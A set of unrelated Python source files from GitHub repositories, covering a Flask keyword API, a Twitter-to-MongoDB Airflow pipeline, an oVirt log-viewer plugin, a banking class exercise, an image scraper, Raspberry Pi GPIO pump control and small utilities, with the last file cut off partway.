+{"seq_id":"1032769706","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, jsonify,abort\nimport sys\nimport time\nimport json\nimport thread\n\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\napp = Flask(__name__)\n\n@app.route('/api/v1.0/keyword/',methods=['GET'])\ndef keyword(task_id):\n f = open('hehe.txt')\n keywords = task_id.split(' ')\n result = []\n for line in f:\n re = {}\n content = line.split(\"\\t\")\n if len(content) == 2:\n re['title'] = content[1]\n re['labels'] = [\"0\"]\n re['time'] = \"0\"\n re['href'] = \"0\"\n result.append(re)\n for word in keywords:\n if word in line:\n re['title'] = content[0]\n re['labels'] = content[1].split(\",\")\n re['time'] = content[2]\n re['href'] = content[3]\n result.append(re)\n break\n\n # print type(str(result).replace('u\\'','\\'').decode(\"unicode-escape\"))\n return json.dumps(result)\n\n@app.route('/api/v1.0/upload/',methods=['GET'])\ndef upload(task_id):\n f = open(\"hehe.txt\",\"a\")\n keyword = task_id.split(\" \")\n f.write(str(keyword[0]) + \"\\t\" + str(keyword[1])+\"\\n\")\n return \"1\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0',debug=True)\n\n","repo_name":"AndyShan/MyHeadline","sub_path":"server/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"16577787516","text":"# Twitter ELT Pipeline\r\n# -----------------------------------------------------------------------\r\n# Imports\r\nfrom pymongo import MongoClient\r\nfrom airflow import DAG\r\nimport tweepy\r\nfrom textblob import TextBlob\r\nimport pandas as pd\r\nfrom airflow.operators.python import PythonOperator\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n# -----------------------------------------------------------------------\r\n# Airflow SetUP\r\n\r\n# Set default_args dictionary\r\ndefault_args = {\r\n # Owner of the DAG\r\n \"owner\": \"me\", \r\n # Start time \r\n \"start_date\": datetime.now(), \r\n \"depends_on_past\": False,\r\n # Retries are disabled\r\n \"retries\": 0,\r\n # If it retries, it waits a tenth of a minute to retry\r\n \"retry_delay\": timedelta(minutes=0.1), \r\n}\r\n\r\n# Creating a DAG called TWITTER_MONGO_DAG that is schedule to \r\n# repeat each minute\r\ndag = DAG(\r\n \"TWITTER_MONGO_DAG\",\r\n default_args=default_args,\r\n # Runs every minute\r\n schedule_interval=timedelta(minutes=1)\r\n)\r\n# -----------------------------------------------------------------------\r\n# Function to scrap tweets and store them in Mongo DB\r\ndef request_to_mongo():\r\n # Login Credentials for the Twitter API\r\n\r\n # Set up API credentials for Twitter API\r\n consumer_key = 'enter-consumer-key-here' \r\n consumer_secret = 'enter-consumer-secret-here'\r\n access_token = 'enter-access-token-here'\r\n access_token_secret = 'enter-access-token-secret-here'\r\n\r\n # Authenticate using the Twitter API\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth)\r\n\r\n client = MongoClient(host='host.docker.internal', port=27017) # connecting client to an internal port within docker where airflow is being run\r\n\r\n # Create new Database in MongoDB called \"mydatabase\"\r\n db = client['mydatabase']\r\n\r\n # Create the collection in MongoDB for the tweets\r\n collection = db['tweets']\r\n\r\n # Get the tweets from the OpenAI Twitter account\r\n searcht = api.search_tweets(q=\"ChatGPT -filter:retweets\", lang='en', count = 100)\r\n\r\n current = []\r\n # Collect the current tweets in the Mongo DB\r\n for doc in collection.find():\r\n current.append(doc['_id'])\r\n # Search through the new and current tweets to ensure no duplicates are\r\n # into Mongo\r\n for tweet in searcht:\r\n if tweet.id in current:\r\n pass\r\n else:\r\n # Create a dictionary for each tweet\r\n tweet_info = {}\r\n # Tweet ID\r\n tweet_info[\"id\"] = tweet.id\r\n # Date the Tweet was tweeted\r\n tweet_info[\"created_at\"] = tweet.created_at\r\n # Text of the Tweet\r\n tweet_info[\"text\"] = tweet.text\r\n # ID of the user that Tweeted the tweet\r\n tweet_info[\"user_id\"] = tweet.user.id\r\n # Location of the user that tweeted\r\n tweet_info[\"location\"] = tweet.user.location\r\n # FOllwoer count of the user that tweeted\r\n tweet_info[\"followers_count\"] = tweet.user.followers_count\r\n # The number of tweets the user has tweeted\r\n tweet_info[\"statuses_count\"] = tweet.user.statuses_count\r\n # When the user created their account\r\n tweet_info[\"user_creation\"] = tweet.user.created_at\r\n # The hashtags included in the tweet\r\n tweet_info[\"hashtags\"] = [hashtag[\"text\"] for hashtag in tweet.entities.get(\"hashtags\")]\r\n # URLs in the tweet\r\n tweet_info[\"urls\"] = [url[\"expanded_url\"] for url in tweet.entities.get(\"urls\")]\r\n # Users mentioned in the 
tweet\r\n tweet_info[\"user_mentions\"] = [user_mention[\"screen_name\"] for user_mention in tweet.entities.get(\"user_mentions\")]\r\n # Whether the tweet contains media\r\n tweet_info[\"media\"] = [media.media_url for media in tweet.entities.get(\"media\")] if hasattr(tweet, \"media\") else None\r\n # Whether the tweet contains a poll\r\n tweet_info[\"polls\"] = [poll.options for poll in tweet.polls()] if hasattr(tweet, \"polls\") else None\r\n # The number of retweets the tweet has\r\n tweet_info[\"retweet_count\"] = tweet.retweet_count\r\n # The number of likes the tweet has\r\n tweet_info[\"favorite_count\"] = tweet.favorite_count\r\n \r\n # Inserting the data into the database in MongoDB\r\n collection.insert_one(tweet_info)\r\n# -----------------------------------------------------------------------\r\n# Function to conduct sentiment analysis on the Tweets\r\ndef sentimental():\r\n\r\n # Connecting client to an internal port within docker where airflow is being run\r\n client = MongoClient(host='host.docker.internal', port=27017) \r\n\r\n # Connecting to the MongoDB\r\n db = client['mydatabase']\r\n\r\n # Connecting to the \"tweets\" collection in MongoDB\r\n collection = db['tweets']\r\n\r\n # Gathering all the data from the database\r\n data = collection.find()\r\n\r\n # Create lists to store the tweet id, tweet text and date of tweet\r\n id_list = []\r\n text_list = []\r\n date_list = []\r\n \r\n # Appenind the id, text and date to lists\r\n for d in data:\r\n id_list.append(d['_id'])\r\n text_list.append(d['text'])\r\n date_list.append(d['created_at'])\r\n\r\n# ---------------------------------------------------------------\r\n# Sentiment Analysis\r\n # Create lists to store the sentiment scores, tweet text and date of tweet\r\n sentiment_data_list = []\r\n text_data_list = []\r\n date_data_list = []\r\n\r\n # Conduct sentiment analysis on the tweets and store each sentiment score (polarity,subjectivity)\r\n for i in range(len(text_list)):\r\n # Text blob handles the sentiment analysis of the tweets\r\n tweet_blob = TextBlob(text_list[i])\r\n # Extracting the polarity and subjectivity scores\r\n polarity, subjectivity = tweet_blob.sentiment\r\n\r\n # Classifying the sentiment (Postive, Negative, Neutral)\r\n if polarity > 0:\r\n sentiment = \"Positive\"\r\n elif polarity == 0:\r\n sentiment = \"Neutral\"\r\n else:\r\n sentiment = \"Negative\"\r\n\r\n # # Storing the sentiment scores, tweet text and tweet dates in a dictionary\r\n sentiment_data = {\"tweet_id\": id_list[i], \"polarity score\": polarity, \"sentiment\": sentiment, \"subjectivity score\": subjectivity}\r\n text_data = {\"tweet_id\": id_list[i], 'tweet_content': text_list[i]}\r\n date_data = {\"tweet_id\": id_list[i], 'tweet_date': date_list[i]}\r\n\r\n sentiment_data_list.append(sentiment_data)\r\n text_data_list.append(text_data)\r\n date_data_list.append(date_data)\r\n\r\n\r\n # Storing the sentiment scores, tweet text and tweet dates in a dataframe\r\n sentiment_df = pd.DataFrame(sentiment_data_list)\r\n text_df = pd.DataFrame(text_data_list)\r\n date_df = pd.DataFrame(date_data_list)\r\n\r\n # Choose folder path to store the dataframes\r\n folder_path = 'insert-folder-path-here'\r\n\r\n # Save the DataFrame as a CSV file in the specified folder\r\n sentiment_df.to_csv(folder_path + '/sentiment_scores.csv', index=False)\r\n text_df.to_csv(folder_path + '/tweets.csv', index=False)\r\n date_df.to_csv(folder_path + '/dates.csv', index=False)\r\n\r\n# 
---------------------------------------------------------------\r\n# Airflow Tasks\r\n\r\n# task1: calls the Twitter API and stores the tweets into MongoDB\r\ntask1 = PythonOperator(\r\n task_id = 'twit_mongo',\r\n python_callable=request_to_mongo,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\n# task2: extracts the data from the MongoDB and conducts sentiment analysis on the tweets\r\ntask2 = PythonOperator(\r\n task_id = 'sentimental_analysis',\r\n python_callable=sentimental,\r\n provide_context = True,\r\n dag=dag\r\n)\r\n\r\ntask2.set_upstream(task1)\r\n# ---------------------------------------------------------------\r\n","repo_name":"georgelopez7/Twitter-Data-ELT","sub_path":"twitter-ELT-airflow.py","file_name":"twitter-ELT-airflow.py","file_ext":"py","file_size_in_byte":7964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
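task2.set_upstream(task1) still works, but current Airflow idiom expresses the same dependency with the bitshift operator; an equivalent one-liner for the DAG above:

# declares the same ordering as task2.set_upstream(task1): task1 first, then task2
task1 >> task2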
+{"seq_id":"3213264872","text":"from ovirt.node import ui\nfrom ovirt.node.plugins import NodePlugin\nfrom ovirt.node.utils import process, system\n\n\"\"\"\nA plugin for a support page\n\"\"\"\n\n\nclass Plugin(NodePlugin):\n def __init__(self, application):\n # Register F8: Display this plugin when F( is pressed\n show_plugin = lambda: application.switch_to_plugin(self)\n application.ui.register_hotkey([\"f8\"], show_plugin)\n super(Plugin, self).__init__(application)\n\n def name(self):\n return _(\"Support\")\n\n def rank(self):\n return 999\n\n def has_ui(self):\n return False\n\n def ui_content(self):\n ws = [ui.Header(\"header[0]\", _(\"Support Info\")),\n ui.Label(\"support.info\", _(\"Select one of the logfiles below.\")),\n ui.Divider(\"divider[0]\"),\n ui.Table(\"support.logfile\", \"\", _(\"Available Logfiles\"),\n self.__debugfiles_to_offer()),\n ]\n\n page = ui.Page(\"page\", ws)\n page.buttons = []\n self.widgets.add(page)\n return page\n\n def model(self):\n return {}\n\n def validators(self):\n return {}\n\n def on_change(self, changes):\n pass\n\n def on_merge(self, changes):\n if changes.contains_any([\"support.logfile\"]):\n logfile = changes[\"support.logfile\"]\n cmds = {\"node\": \"cat /var/log/ovirt.log | less\",\n \"ui\": \"cat /var/log/ovirt-node.log | less\",\n \"messages\": \"cat /var/log/messages | less\",\n \"audit\": \"cat /var/log/audit/audit.log | less\",\n \"dmesg\": \"dmesg | less\",\n \"journal\": \"journalctl --all --catalog --full\"\n }\n\n cmd = cmds[logfile] if logfile in cmds else None\n\n if cmd:\n contents = process.check_output(cmd, shell=True,\n stderr=process.STDOUT)\n return ui.TextViewDialog(\"output.dialog\", _(\"Logfile\"),\n contents)\n\n def __debugfiles_to_offer(self):\n items = [(\"node\", \"/var/log/ovirt.log\"),\n (\"ui\", \"/var/log/ovirt-node.log\"),\n (\"dmesg\", \"dmesg\"),\n (\"audit\", \"/var/log/audit/audit.log\")]\n\n if system.has_systemd():\n items.append((\"journal\", \"journal (systemd)\"))\n else:\n items.append((\"messages\", \"/var/log/messages\"))\n\n return items\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/setup/core/support_page.py","file_name":"support_page.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"}
+{"seq_id":"40300518138","text":"\r\nfrom mimetypes import init\r\n\r\n\r\nclass Bank :\r\n bankID = -1\r\n allBanks = set([])\r\n def __init__(self,bankFullName,bankAbbrivation):\r\n self.bankFullName = bankFullName\r\n self.bankAbbrivation = bankAbbrivation\r\n bankID+=1\r\n self.bankID = bankID\r\n\r\n @staticmethod\r\n def findBank(bankAbbrivation):\r\n for i in Bank.allBanks:\r\n if i.bankAbbrivation == bankAbbrivation:\r\n return True,i\r\n return False\r\n\r\n @staticmethod\r\n def createNewBank(bankName,bankAbbrivation):\r\n newBank = Bank(bankName,bankAbbrivation)\r\n if(Bank.allBanks.add(newBank)==False):\r\n print(\"Bank already exits!!\")\r\n return False\r\n return True\r\n\r\nclass Account:\r\n accountNumber = 0\r\n def __init__(self,bank):\r\n self.accountNumber = Account.accountNumber\r\n self.bank = bank\r\n self.balance = 1000\r\n def isAccountExists(self,bankAbbrivation):\r\n return self.bank.bankAbbrivation == bankAbbrivation\r\n\r\n def displayAccountBalance(self):\r\n print(\"Account Balance is \"+self.balance)\r\n\r\n def isSufficientBalace(self,amount):\r\n return self.balance>=amount\r\n\r\n def updateAccountBalance(self,amount,operation):\r\n if operation==\"Add\":\r\n self.balance+=amount\r\n else:\r\n self.balance-=amount\r\n return\r\n\r\n @staticmethod\r\n def createNewAccount(bankAbbrivation):\r\n isBankExits,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExits:\r\n print(\"The given bank name doest not exits!!\")\r\n return False\r\n newAccount = Account(bankObj)\r\n return newAccount\r\n\r\n\r\nclass Customer:\r\n customerID = -1\r\n allCustomers = []\r\n def __init__(self,firstName,lastName,totalBalance,userName):\r\n customerID+=1\r\n self.customerID = Customer.customerID\r\n self.firstName = firstName\r\n self.lastName = lastName\r\n self.totalBalance = totalBalance\r\n self.accounts = []\r\n self.userName = userName\r\n \r\n @staticmethod\r\n def findCustomer(self,userName):\r\n for customer in Customer.allCustomers:\r\n if customer.userName == userName:\r\n return True,customer\r\n \r\n return False\r\n \r\n\r\n\r\n def findAccount(self,bankAbbrivation):\r\n for account in self.accounts:\r\n if account.bank.bankAbbrivation == bankAbbrivation:\r\n return True,account\r\n return False\r\n \r\n def createNewAccount(self,bankAbbrivation):\r\n isAccountExists,_ = self.findAccount(bankAbbrivation)\r\n if isAccountExists:\r\n print(\"account already exits in this bank!! 
\")\r\n return \r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if isBankExists :\r\n return \r\n newAccount = Account.createNewAccount(bankAbbrivation)\r\n self.accounts.append(newAccount)\r\n return True,newAccount\r\n\r\n def deposit(self,bankAbbrivation,amount):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be deposited as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n account.updateAccountBalance(amount,\"Add\")\r\n print(\"Amount has been deposited in your accout successfully\")\r\n self.__updateTotalBalace()\r\n return True\r\n print(\"cannot deposit the amount as the account does not exits\")\r\n return False\r\n\r\n def Withdraw(self,amount,bankAbbrivation):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be withdraw as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n if account.isSufficientBalace(amount):\r\n account.updateAccountBalance(amount,\"subtract\")\r\n print(\"Amount has been withdrawn from your account successfully!!\")\r\n self.__updateTotalBalace()\r\n return True\r\n\r\n print(\"Insufficient account balance!\")\r\n return \r\n print(\"cannot withdraw the amount as the account does not exits\")\r\n return False\r\n \r\n def transferAmount(self,creditCustomerUserName,creditCustomerBankName,debitCustomerBankName,amount):\r\n if Customer.findCustomer(creditCustomerUserName) and Customer.findCustomer(debitCustomerBankName):\r\n customerObj = Customer.findCustomer(creditCustomerBankName)\r\n self.Withdraw(debitCustomerBankName,amount)\r\n customerObj.deposit(creditCustomerUserName,amount)\r\n return True\r\n print(\"cannot transfer the amount\")\r\n return False\r\n\r\n def selfTransfer(self,creditBankName,debitBankName,amount):\r\n if Bank.findBank(creditBankName) and Bank.findBank(debitBankName):\r\n self.Withdraw(debitBankName,amount)\r\n self.deposit(creditBankName,amount)\r\n return True\r\n print(\"cannot transfer the amount!\")\r\n return False\r\n\r\n def __updateTotalBalace(self):\r\n self.totalBalance = 0\r\n for account in self.accounts:\r\n self.totalBalance+=account.balance\r\n return self.totalBalance\r\n \r\n\r\n def displayBalance(self):\r\n print(self.firstName+\" your account balance is \"+self.totalBalance)\r\n for account in self.accounts:\r\n account.displayBalance()\r\n \r\n\r\n","repo_name":"Sahil8317/Forcepoint-Training-Assignments","sub_path":"BankingApp.py","file_name":"BankingApp.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22208067626","text":"from bs4 import *\nfrom pathlib import PurePath\nimport requests\nimport sys\nimport os\n\nclass bcolors:\n OK = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n RESET = \"\\033[0m\"\n\ndef get_links(url, url_links, dominio):\n try:\n response = requests.get(url)\n except:\n print(bcolors.FAIL + \"Error: invalid URL\" + bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n links = soup.findAll('a')\n for tag in links:\n cut = tag.get('href')\n if cut != None:\n if dominio in cut:\n url_links.append(cut)\n elif cut.startswith('/') == True:\n cut = \"https://\" + dominio + cut\n url_links.append(cut)\n return (url_links)\n \ndef get_images(url_links, dominio):\n url_images = []\n for link in url_links:\n try:\n response = requests.get(link)\n except:\n print(bcolors.FAIL + \"Error: invalid URsL \" + link +bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n images = soup.findAll('img')\n for tag in images:\n cut = tag.get('src')\n if cut != None and len(cut) > 0:\n if cut.endswith(\".png\") or cut.endswith(\".gif\") or cut.endswith(\".bmp\") or cut.endswith(\".jpg\" or cut.endswith(\".jpeg\")):\n if cut.startswith('//') == True:\n cut = cut[2:]\n if dominio in cut:\n if cut.startswith(\"https\") == False:\n cut = \"https://\" + cut\n url_images.append(cut)\n elif cut.startswith('/') and \".com\" != cut:\n cut = \"https://\" + dominio + cut\n url_images.append(cut)\n return url_images\n\ndef check(rec):\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n url_images = []\n url_links = []\n \n if (len(sys.argv) == 1):\n print(bcolors.FAIL + \"Error: please insert a URL\" + bcolors.RESET)\n exit()\n elif \"-r\" != opts:\n url = sys.argv[len(sys.argv) - 1]\n if url.endswith(\"/\") == False:\n url = url + '/'\n if url.startswith(\"http\") == False:\n url = \"https://\" + url\n\n dominio = url[url.index('/') + 2:-1]\n \n if rec != 0 and len(url_links) < int(rec):\n x = 0\n url_links = get_links(url, url_links, dominio)\n while len(url_links) < int(rec):\n url_links = get_links(url_links[x], url_links, dominio)\n x += x\n result = []\n for link in url_links:\n if link not in result:\n result.append(link)\n if len(result) < int(rec):\n print(bcolors.WARNING + \"Warning: has requested recursion \" + str(rec) + \" but only \" + str(len(result)) + \" urls with the supplied domain are valid\" + bcolors.RESET)\n url_links = result\n else:\n url_links.append(url)\n url_images = get_images(url_links, dominio)\n return url_images\n\ndef clean_folder(path, content):\n for file in content:\n os.remove(path + '/' + file)\n\ndef download_image(folder, url, name):\n path = os.getcwd() + '/'+ folder\n if os.path.exists(path) == False:\n os.mkdir(folder)\n name = folder + '/' + name\n f = open(name,'wb')\n try:\n response = requests.get(url)\n f.write(response.content)\n except:\n print(bcolors.WARNING + \"Invalid URL \", url + bcolors.RESET)\n return 0\n f.close()\n return 1\n\ndef main():\n opts = [opt for opt in sys.argv[1:]]\n if \"-p\" in opts:\n try:\n folder = opts[opts.index(\"-p\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid folder\" + bcolors.RESET)\n exit()\n if folder.startswith(\"-\"):\n print(bcolors.FAIL + \"Error: invalid name for folder\" + bcolors.RESET)\n exit()\n else:\n folder = \"data\"\n\n if \"-l\" in opts:\n if \"-r\" not in opts:\n print(bcolors.FAIL + \"Error: \\\"-l\\\" specified but no recursivity \\\"-r\\\"\" + bcolors.RESET)\n exit()\n else:\n try:\n rec = 
opts[opts.index(\"-l\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n if rec.isnumeric() == False:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n elif \"-r\" in opts:\n rec = 5\n else:\n rec = 0\n\n url_images = check(rec)\n if url_images == None:\n exit()\n else:\n x = 0\n path = os.getcwd() + '/' + folder\n if os.path.exists(path) == True:\n content = os.listdir(path)\n clean_folder(path, content)\n for image in url_images:\n extension = image[image.rfind('.'):len(image)]\n if \".jpeg\" in extension:\n extension = \".jpeg\"\n else:\n extension = extension[0:4]\n x += download_image(folder, url_images[x], \"image\" + str(x) + extension)\n if x == rec:\n break\n print(bcolors.OK + str(x) + bcolors.RESET + \" images downloaded successfully\")\n\nif __name__ == '__main__':\n main()","repo_name":"veaz/arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
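spider.py resolves relative links by concatenating 'https://' + dominio + cut by hand; the standard library's urljoin covers the same absolute-path, relative-path and scheme-relative cases more robustly, as in this sketch (the example.com URLs are placeholders):

from urllib.parse import urljoin

base = 'https://example.com/gallery/'
print(urljoin(base, '/img/a.png'))               # https://example.com/img/a.png
print(urljoin(base, 'b.png'))                    # https://example.com/gallery/b.png
print(urljoin(base, '//cdn.example.com/c.png'))  # https://cdn.example.com/c.png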
+{"seq_id":"4860332946","text":"\"\"\"Exemplo de Pool nativo\"\"\"\n\nfrom multiprocessing import Pool\nfrom os import getpid\nfrom pprint import pprint\n\n\ndef soma_2(x):\n return x + 2, getpid()\n\n\nif __name__ == '__main__':\n\n workers = Pool(5)\n\n # Sync\n # result = workers.map(soma_2, range(100))\n # pprint(result)\n\n # Async\n result = workers.map_async(soma_2, range(100))\n result.wait()\n pprint(result.get())\n","repo_name":"joscelino/multiprocessamento_python","sub_path":"multi_processos/exemplos/app4.py","file_name":"app4.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3022298988","text":"# File: wordChart.py\r\n# Kevin Nakashima\r\n# Takes a text file\r\n# Program will count the number of times each word occurs in file\r\n# Program will print out a histogram of words and frequencies\r\n#==============================================================================\r\n# RESOURCES\r\n# http://programminghistorian.org/lessons/counting-frequencies\r\n# http://moderndata.plot.ly/generate-html-reports-with-python-pandas-and-plotly/\r\n# https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions\r\n# https://www.tutorialspoint.com/python/python_dictionary.htm\r\n# http://help.plot.ly/embed-graphs-in-websites/\r\n# IMPORTS\r\n\r\n\r\n# CLASS DECLARATIONS\r\nclass report():\r\n __slots__ = ['word','wordlist','fName','shortest','longtest','most','least']\r\n def __init__(self, fName):\r\n self.word = \"\"\r\n self.wordlist = {}\r\n self.fName = fName\r\n self.shortest = \"\"\r\n self.longest = \"\"\r\n self.most = \"\"\r\n self.least = \"\"\r\n \r\n def addWord(self):\r\n self.word = self.word.lower()\r\n if len(self.word) == 1:\r\n self.shortest = self.word\r\n if len(self.word) > len(self.longest):\r\n self.longest = self.word\r\n if self.word in self.wordlist:\r\n #if dictionary has word, increment frequency\r\n self.wordlist[self.word] = self.wordlist[self.word] + 1\r\n else:#if not in dictionary, create\r\n self.wordlist[self.word] = 1\r\n #reset word\r\n self.word = \"\"\r\n\r\n def mostLeast(self):\r\n self.most = max(self.wordlist, key=self.wordlist.get)\r\n self.least = min(self.wordlist, key=self.wordlist.get)\r\n\r\n \r\n def writeReport(self, f):\r\n self.mostLeast()\r\n outFile = open(f + \".html\", 'w')\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(self.fName + \"Analysis\")\r\n outFile.write(''' \\n\r\n \\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(\"Longest Word: {}
\".format(self.longest))\r\n outFile.write(\"Shortest Word: {}
\".format(self.shortest))\r\n outFile.write(\"Word used most: {}
\".format(self.most))\r\n outFile.write(\"Word used least: {}
\".format(self.least))\r\n for keys, values in self.wordlist.items():\r\n line = \"{} : {}
\".format(keys, values)\r\n outFile.write(line)\r\n outFile.write(\"\\n\\\r\n \")\r\n #close output File\r\n outFile.close()\r\n\r\ndef main():\r\n #variable declarations\r\n r = report(input(\"Enter the file name: \"))\r\n #open file to read\r\n with open(r.fName) as f:\r\n while True:\r\n #read one character at a time\r\n c = f.read(1) \r\n #if not alphanumeric, ignore\r\n if c.isalpha():\r\n r.word += c\r\n elif c == ' ' or c == '\\n':\r\n r.addWord()\r\n elif not c:\r\n r.addWord()\r\n break\r\n\r\n f = r.fName.split('.')\r\n r.writeReport(f[0])\r\n \r\nmain()\r\n","repo_name":"Sirly/practice_python_programs","sub_path":"wordChart.py","file_name":"wordChart.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"75084273690","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef digital_for_duration(pin, duration):\n if pin == 21: # If the chosen pin is for the Washing pump\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.HIGH) # Open the Valve\n print(\"Valve (Pin 20) opened.\")\n \n elif pin == 23: # If the chosen pin is for the Sample water\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.LOW) # Close the Valve\n print(\"Valve (Pin 20) closed.\")\n \n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\n print(f\"Pin {pin} turned on for {duration} seconds.\")\n \n try:\n time.sleep(duration)\n except KeyboardInterrupt:\n print(f\"\\nInterrupted! Turning off pin {pin} immediately.\")\n \n GPIO.output(pin, GPIO.LOW)\n print(f\"Pin {pin} turned off.\")\n\ndef pwm_for_duration(pin, duty_cycle, duration):\n GPIO.setup(pin, GPIO.OUT)\n \n pwm = GPIO.PWM(pin, 100) # Frequency is hardcoded to 100Hz\n \n try:\n pwm.start(duty_cycle)\n print(f\"Started PWM on pin {pin} with 100Hz frequency and {duty_cycle}% duty cycle.\")\n print(f\"It will run for {duration} seconds or you can press Ctrl+C to exit early.\")\n time.sleep(duration)\n except KeyboardInterrupt:\n print(\"\\nExiting early due to user interrupt.\")\n finally:\n pwm.stop()\n print(f\"Stopped PWM on pin {pin}.\")\n\ndef main():\n try:\n while True:\n print(\"\\nMenu:\")\n print(\"1. Digital Output\")\n print(\"2. PWM Output\")\n print(\"3. Exit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == \"1\":\n print(\"\\nDigital Output Options:\")\n print(\"1. Sample water (Pin 23)\")\n print(\"2. Washing pump (Pin 21)\")\n print(\"3. Mixing pump (Pin 16)\")\n print(\"4. Valve (Pin 20)\")\n \n digital_choice = input(\"Enter your choice: \")\n if digital_choice == \"1\":\n pin = 23\n elif digital_choice == \"2\":\n pin = 21\n elif digital_choice == \"3\":\n pin = 16\n elif digital_choice == \"4\":\n pin = 20\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duration = float(input(\"Enter duration in seconds: \"))\n digital_for_duration(pin, duration)\n \n elif choice == \"2\":\n print(\"\\nPWM Output Options:\")\n print(\"1. LED (Pin 12, max 40%)\")\n print(\"2. Dosing pump (Pin 13, max 40%)\")\n \n pwm_choice = input(\"Enter your choice: \")\n if pwm_choice == \"1\":\n pin = 12\n elif pwm_choice == \"2\":\n pin = 13\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duty_cycle = float(input(\"Enter duty cycle (0-40): \"))\n if duty_cycle > 40:\n print(\"Duty cycle exceeds maximum limit. Setting to 40%.\")\n duty_cycle = 40\n\n duration = float(input(\"Enter duration in seconds: \"))\n pwm_for_duration(pin, duty_cycle, duration)\n \n elif choice == \"3\":\n print(\"Exiting program.\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\n except KeyboardInterrupt:\n print(\"\\nProgram interrupted by user. Exiting.\")\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"timothymoniaga/raspi-ph","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10068552328","text":"import os\nimport re\nimport sys\nfrom packaging import version\nfrom subprocess import Popen, PIPE\nfrom poco.services.file_utils import FileUtils\nfrom poco.services.state import StateHolder\nfrom .console_logger import ColorPrint\nfrom datetime import *\n\n\nclass EnvironmentUtils:\n\n    @staticmethod\n    def get_variable(key, default=None):\n        return os.environ.get(key, default)\n\n    @staticmethod\n    def set_variable(key, value):\n        os.environ[key] = value\n\n    @staticmethod\n    def set_poco_uid_and_gid():\n        if os.name == \"posix\":\n            EnvironmentUtils.set_variable(\"POCO_UID\", str(os.getuid()))\n            EnvironmentUtils.set_variable(\"POCO_GID\", str(os.getgid()))\n\n    @staticmethod\n    def check_docker():\n        p = Popen(\"docker version -f {{.Server.Version}}\", stdout=PIPE, stderr=PIPE, shell=True)\n        out, err = p.communicate()\n        if not len(err) == 0 or len(out) == 0:\n            ColorPrint.exit_after_print_messages(message='Docker not running.')\n        # decode the bytes output before comparing the numeric major version\n        if int(EnvironmentUtils.decode(out).split(\".\")[0]) < 17:\n            ColorPrint.exit_after_print_messages(message='Please upgrade Docker to version 17 or above')\n\n    @staticmethod\n    def check_kubernetes():\n        EnvironmentUtils.check_base(command=\"kubectl version --short\", message_head=\"Kubernetes\")\n\n    @staticmethod\n    def check_helm():\n        EnvironmentUtils.check_base(command=\"helm version -s --short\", message_head=\"Helm\")\n\n    @staticmethod\n    def check_base(command, message_head):\n        p = Popen(command, stdout=PIPE, stderr=PIPE, shell=True)\n        out, err = p.communicate()\n        if not len(err) == 0 or len(out) == 0:\n            ColorPrint.exit_after_print_messages(message=EnvironmentUtils.decode(err).strip())\n        ColorPrint.print_with_lvl(message=message_head + \"\\n  \" + EnvironmentUtils.decode(out).strip(), 